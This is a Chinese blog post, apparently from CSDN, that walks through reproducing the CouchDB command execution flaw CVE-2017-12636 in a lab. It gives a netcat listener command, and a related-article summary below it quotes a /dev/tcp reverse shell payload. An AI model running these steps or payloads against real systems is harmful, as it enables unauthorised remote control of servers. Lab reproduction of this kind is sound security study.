Couchdb 命令执行漏洞复现 (CVE-2017-12636)

已于 2023-11-25 23:14:40 修改
阅读量306 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全
于 2023-11-25 23:13:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XXokok/article/details/134622125
版权

Couchdb 命令执行漏洞复现 (CVE-2017-12636)

1、下载couchdb.py

2、修改目标和反弹地址

3、Python3调用执行即可

couchdb.py文件下载地址:
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py

在VULFocus上开启环境

image

修改couchdb.py文件配置

​​​1700924973694​​​​

然后在攻击机上用nc监听对应端口:

nc -lvvp 9988

​​image​​

直接用python运行couchdb.py文件即可

image

回到攻击机上面发现已经收到目标反弹过来的shell

image

直接执行命令即可

image

梧六柒
关注
专栏目录
WebLogic Server JNDI注入漏洞复现(CVE-2024-20931)
0xSec
02-23 2073
在Oracle发布的2024年1月补丁中,成功修复了一个基于Weblogic T3\IIOP协议的远程命令执行漏洞CVE-2024-20931,该漏洞是由于 CVE-2023-21839 漏洞未修补完全,未经身份验证的攻击者通过 T3、IIOP进行网络访问来破坏 Oracle WebLogic Server。成功利用此漏洞可能会导致 Oracle WebLogic Server 被接管。
Couchdb 任意命令执行漏洞CVE-2017-12636复现
玄道的网安博客
05-06 3480
简介 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 影响版本 小于 1.7.0 以及 小于 2.1.1 环境搭建 https://githu...
CouchDB漏洞复现
weixin_44259979的博客
10-07 840
CouchDB漏洞复现
vulhub远程执行命令漏洞CVE-2017-12636
最新发布
qq_65852138的博客
09-08 296
vulhub远程执行命令漏洞CVE-2017-12636
CouchDB任意命令执行CVE-2017-12636
Kevin's Blog
07-26 1008
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问,CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
Couchdb数据库-命令执行漏洞复现-CVE-2017-12636
apple_52661176的博客
08-31 246
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。0>&1""" #攻击机ip。开启vulfocus靶场环境。在攻击机上开启nc监听。
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636
易编橙 · 终身成长社群,相遇已是上上签!
10-22 750
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636)(1)
2401_83817171的博客
04-12 674
漏洞复现Couchdb 2.x和1.x的API接口有一定的区别,所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本,如果你想测试2.1.0版本,可以启动CVE-2017- 12635附带的环境。靶机环境 139.196.87.102 (vulhub)攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)启动 Couchdb 垂直权限绕过漏洞 环境1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径cd /usr/local/tools/
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 405
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
Couchdb 垂直权限绕过漏洞CVE-2017-12635)
一枚不知名的Java程序猿
10-02 1000
vulhub漏洞复现学习过程
Couchdb 任意命令执行漏洞CVE-2017-12636
weixin_44311721的博客
07-30 1472
Couchdb 任意命令执行漏洞CVE-2017-12636Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的...
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_46239998的博客
01-01 806
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机。target = 'http://192.168.217.128:5984' # 目标ip。如上图所示即反弹shell成功!三、构造payload。
Apache couchdb 命令执行CVE-2017-12636复现
YouthBelief的博客
11-04 823
couchdb 命令执行CVE-2017-12636couchdb 命令执行CVE-2017-12636)0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具复现0x04 漏洞修复 couchdb 命令执行CVE-2017-12636) Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展
利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞CVE-2017-12636
07-17 414
漏洞原理:Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15...
【vulhub】Couchdb 任意命令执行漏洞CVE-2017-12636
qq_45300786的博客
09-14 750
特征 特征请参考我的上一篇帖子 【vulhub】Couchdb 垂直权限绕过漏洞CVE-2017-12635)漏洞复现 影响版本:小于 1.7.0 以及 小于 2.1.1 复现 注:复现中的很多东西也要用到这篇帖子,所以先看这篇 【vulhub】Couchdb 垂直权限绕过漏洞CVE-2017-12635)漏洞复现 再来看本篇帖子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 本次复现是用的版本1.6 http://192.168.1
CVE-2017-12635+12636 复现+反弹shell
weixin_45695535的博客
05-08 1532
整体过程漏洞描述一、复现过程环境复现cve-2017-12636反弹shellpython3 exp 反弹shell参考文章 漏洞描述 Apache CouchDB 是一个开源数据库,专注于易用性和成为” 完全拥抱 web 的数据库”。它是一个使用 JSON 作为存储格式,JavaScript 作为查询语言,MapReduce 和 HTTP 作为 API 的 NoSQL 数据库。应用广泛,如 BBC 用在其动态内容展示平台,Credit Suisse 用在其内部的商品部门的市场框架,Meebo,用在其社交
couchdb 任意命令执行漏洞 cve-2017-12636
whatday的专栏
01-30 338
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 漏洞简介: CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Obj
Apache CouchDB信息泄露漏洞CVE-2023-26268深度解析及解决方案
"Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告,涉及Apache CouchDB 3.3.x和3.2.x版本,需要升级至安全版本或使用深信服解决方案进行资产检测和漏洞检测。" Apache CouchDB是一款开源的NoSQL文档数据库系统,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值